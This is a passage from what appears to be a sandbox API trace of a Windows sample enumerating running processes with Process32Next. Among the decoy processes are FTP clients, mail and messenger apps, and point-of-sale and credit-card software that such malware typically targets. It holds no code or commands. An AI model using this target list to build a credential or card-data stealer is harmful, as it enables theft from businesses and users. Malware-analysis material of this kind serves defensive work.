lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0301.617] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.618] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.620] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0301.622] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.623] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.625] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.627] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.631] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.633] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.634] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.636] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0301.637] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0301.639] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0301.640] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.642] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2d, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0301.644] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0301.646] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0301.648] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0301.649] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0301.651] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.653] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0301.654] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0301.656] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0301.657] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0301.659] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0301.661] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0301.662] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0301.664] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0301.666] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0301.768] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0301.769] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0301.771] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0301.773] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0301.774] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0301.775] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0301.777] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0301.779] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0301.781] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0301.782] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0301.784] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0301.785] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0301.787] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0301.788] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0301.790] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0301.791] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0301.793] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0301.795] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0301.797] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0301.798] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0301.800] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0301.802] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0301.803] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0301.805] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0301.807] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0301.891] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0301.893] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0301.895] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0301.897] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0301.899] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0301.901] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0301.903] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0301.906] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0301.908] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0301.910] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0301.911] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0301.913] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0301.915] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0301.917] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0301.919] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0301.921] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0301.923] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0301.925] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0301.927] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0301.929] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0301.930] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0302.897] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0303.056] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0303.060] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0303.062] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0303.064] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0303.083] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0303.085] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0303.086] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0303.088] Process32Next 